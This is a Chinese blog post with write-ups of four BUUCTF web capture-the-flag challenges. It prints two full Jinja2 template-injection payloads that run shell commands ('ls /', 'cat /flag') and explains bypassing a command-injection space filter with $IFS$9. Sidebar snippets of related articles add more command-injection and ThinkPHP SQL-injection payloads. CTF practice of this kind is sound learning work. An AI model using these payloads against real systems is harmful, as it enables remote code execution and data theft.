Web-5(17-20)-BUUCTF平台

最新推荐文章于 2023-10-17 15:23:43 发布
最新推荐文章于 2023-10-17 15:23:43 发布
阅读量3.3k 收藏
点赞数 2
分类专栏: CTF BUUCTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/105431422
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
BUUCTF
19 篇文章 1 订阅
订阅专栏

本篇内容
[BJDCTF 2nd]fake google
[极客大挑战 2019]Http
[De1CTF 2019]SSRF Me
[GXYCTF2019]Ping Ping Ping

上一篇 | 目录 | 下一篇

[BJDCTF 2nd]fake google

在这里插入图片描述
直接在搜索框回车,然后右键查看源代码:
在这里插入图片描述
尝试模板注入成功:
在这里插入图片描述
直接上手payload看看根路径下的文件:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}

在这里插入图片描述
看到了flag,cat一下:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}

在这里插入图片描述




[极客大挑战 2019]Http

直接右键源代码:
在这里插入图片描述
在这里插入图片描述
既然要来自https://www.Sycsecret.com,那就在Header信息里加Referer:
在这里插入图片描述
要使用Syclover浏览器,改:
在这里插入图片描述
要本地才能读,改:
在这里插入图片描述
拿到最终flag。




[De1CTF 2019]SSRF Me

本人对这题见解不深刻,讲解不好,直接放大佬博客:[De1CTF 2019]SSRF Me之愚见




[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
老套路了,直接尝试:
在这里插入图片描述
看到flag.php,尝试读取:
在这里插入图片描述
尝试一番后发现,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的诸如/**/、%0a、${IFS}等都被过滤了,但$IFS$9还可以使用。
在这里插入图片描述
在这里插入图片描述
右键查看源代码,发现最终flag。
在这里插入图片描述





========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105431422
========================================================

airrudder
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
[GXYCTF2019]Ping Ping Ping 1
weixin_45674567的博客
07-08 1254
直接尝试:/?ip=127.0.0.1;ls; 看到flag.php,尝试读取:他提示不能有空格,绕过试一试: 尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS等都被过滤了,但{IFS}等都被过滤了,但IFS等都被过滤了,但IFS9还可以使用,于是/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;cat9还可以使用,于是/?ip=127.0.0.1;catIFS$9flag.php; 又说不能出现..
BUUCTF web小结 1.0
Sk1y的博客
12-21 600
目录 [ACTF2020 新生赛]Include [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping 方法一:绕过正则表达式 方法二:因为过滤了bash,但是没有过滤sh,可用下面的方法,flag在f12中 方法三:内敛执行绕过,将反引号内命令的输出作为输入执行,flag在f12中 总结 [ACTF2020 新生赛]Include 打开题目:注意一下F12里面的跳转,点击tips,跳转, ur
BUUCTF-做题记录
最新发布
qq_46230755的博客
10-17 347
很久没做题了,还是随便来水一水吧,之前都在学别的。
buuctf [ThinkPHP]IN SQL INJECTION
qq_1873822的博客
03-19 909
打开这样的 爆出用户名密码 ?ids[]=1&ids[]=2 错误回显敏感信息,数据库名 ?ids[0,updatexml(0,concat(0xa,user()),0)]=1 漏洞原理 https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html https://www.secpulse.com/archives/59120.html ...
ping cat.flag.php,[GXYCTF2019]Ping Ping Ping 1
weixin_28996083的博客
03-26 363
进入界面根据提示进行ping信号看到网页的内容就想到经典的Linux命令执行,使用命令执行的管道符 " | "尝试列出文件FLAG应该在Flag.php里面构造playload进行提取http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat flag.php提示:“/?ip= fxck you...
spring-web-5.0.4.RELEASE.jar
03-21
spring-web-5.0.4.RELEASE.jar; spring-web-5.0.4.RELEASE.jar
EasyPHP5-2-17
07-22
资源名称:EasyPHP5-2-17工具简介:EasyPHP帮助你使用PHP管理数据、开发站点和应用程序。它是调试PHP程序的好东西,集成: Apache , PHP , MySQL , Zend , PhpMyAdmin 为一体的web环境套件相关图片: 资源太大,传百度...
spring-web-5.1.5.RELEASE.jar
01-08
spring-web-5.1.5.RELEASE.jar
项目四-web20与网络营销.ppt
11-13
项目四-web20与网络营销.ppt
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 519
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3819
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
ThinkPHP IN SQL INJECTION解题日记20221122
weixin_47493252的博客
11-22 463
ThinkPHP IN SQL INJECTION解题日记20221122
BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 8650
BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1208
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
BUUCTF-[GXYCTF2019] Ping Ping Ping
lunan的博客
05-15 951
BUUCTF-[GXYCTF2019] Ping Ping Ping 考点: 1、命令联合执行 2、命令绕过空格的方法 3、内联执行 一、命令联合执行 ; 前面的执行完执行后面的 | 管道符,上一条命令的输出,作为下一条命令的参数(显示后面的执行结果) || 当前面的执行出错时(为假)执行后面的 & 将任务置于后台执行 && 前面的语句为假则直接出错,后面的也不执行,前面只能为真 %0a (换行) %0d (回车) 二、命令绕过空格的方法
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 2966
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
BUUCTF之杂项,密码学,Web(五题)
qq_46148060的博客
09-27 499
1.镜子里面的世界 打开后看到一张图 用StegSlove解题,选择图片后多试几次发现了flag。 2.Rabbit 兔子吗?百度一下发现是一种加密解密名称,那就复制字符串用rabbit解密就得到了flag。 Web之极客大挑战Have fun 打开链接后看到一起来撸猫,然后再看图片的原码 原码拉到最后看到 大概就是当cat=dog时,可以获取到flag,那就传参试试,输入?cat=dog,就得到了答案。 4.Web之 ...
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值